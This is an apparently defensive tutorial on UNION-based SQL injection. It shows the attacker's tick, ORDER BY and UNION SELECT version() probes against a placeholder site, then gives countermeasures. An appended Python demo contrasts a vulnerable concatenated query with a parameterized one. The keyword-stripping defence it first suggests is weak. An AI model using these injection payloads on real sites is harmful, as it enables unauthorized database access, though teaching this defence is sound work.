Blocking Web Attacks – Part 2 (UNION SQL injections)

When a developer's query is built from user input and that input is not filtered properly, an attacker can easily perform a UNION-based SQL injection attack.

Many web sites pass parameters through the URL. For example, a PHP page xyz.php that reads an id variable will have a URL of the form xyz.php?id=<number>.

An attacker will probe for this vulnerability by adding a tick (single quote) to the end of the parameter, so the URL becomes xyz.php?id='. If the page comes back with a MySQL error, the site can most likely be attacked with a UNION SQL injection.

The error you get may look like

http://www.victim-site.com/xyz.php?id=1'

You have an error in your SQL syntax near '' at line 1 SELECT SUM(orderquantity) as order_type FROM customer_orders where (orderstatus='completed' OR orderstatus='confirmed' OR oerderstatus='pending') AND user_id=1'

Now the attacker may try more advanced probes using ORDER BY:

http://www.victim-site.com/xyz.php?id=1 ORDER BY 1--

The above will not produce an error.

http://www.victim-site.com/xyz.php?id=1 ORDER BY 2--

This tells the SQL engine to order by the second column. If it comes back with an error, the query returns only one column, which tells the attacker how many columns an injected UNION SELECT must supply.

http://www.victim-site.com/xyz.php?id=-1 UNION SELECT ALL version()--

The above unions the original query with a SELECT that executes version() in its single column; because id=-1 matches no real row, the database version is what the page displays.

Countermeasures:

To overcome such attacks on your application you can implement logic like the following:

eregi_replace() checks the string for SQL commands such as those mentioned above and replaces them with a blank space.
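As an added illustration (not code from the original post), the query from the error message above is reproduced in Python against an in-memory SQLite database standing in for PHP/MySQL, with a constructed sample table, so the tick, ORDER BY and UNION probes can be seen failing or succeeding; in place of the keyword-stripping approach described above (eregi_replace() was deprecated in PHP 5.3 and removed in PHP 7) the hardened version allow-lists the id and binds it as a query parameter.

```python
import re
import sqlite3


def make_db():
    # Constructed sample data; table and columns mirror the query in the error message above.
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE customer_orders (user_id INTEGER, orderstatus TEXT, orderquantity INTEGER);
        INSERT INTO customer_orders VALUES (1, 'completed', 3), (1, 'pending', 2), (2, 'completed', 7);
    """)
    return db


BASE = ("SELECT SUM(orderquantity) AS order_type FROM customer_orders "
        "WHERE (orderstatus='completed' OR orderstatus='confirmed' OR orderstatus='pending') ")


def order_total_vulnerable(db, user_id):
    # The raw ?id= value is concatenated into the SQL text, so ORDER BY / UNION
    # appended by the client change the statement itself.
    return [row[0] for row in db.execute(BASE + "AND user_id=" + user_id).fetchall()]


def run_vulnerable(db, user_id):
    # Mimics a page that echoes the database error, which is what the probes above rely on.
    try:
        return ("rows", order_total_vulnerable(db, user_id))
    except sqlite3.Error as exc:
        return ("error", str(exc))


def order_total_safe(db, user_id):
    # Allow-list the expected shape (an integer), then bind the value as a
    # parameter: the driver sends it as data, so it can never extend the statement.
    if not re.fullmatch(r"-?\d{1,9}", user_id):
        raise ValueError("id must be an integer")
    return [row[0] for row in db.execute(BASE + "AND user_id=?", (int(user_id),)).fetchall()]


def db_version(db):
    # SQLite's equivalent of MySQL's version().
    return db.execute("SELECT sqlite_version()").fetchone()[0]


if __name__ == "__main__":
    db = make_db()
    print(run_vulnerable(db, "1'"))                                 # error, like the MySQL message above
    print(run_vulnerable(db, "1 ORDER BY 2--"))                     # error: result has only one column
    print(run_vulnerable(db, "-1 UNION SELECT sqlite_version()--")) # rows include the database version
    print(order_total_safe(db, "1"))                                # [5]
```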
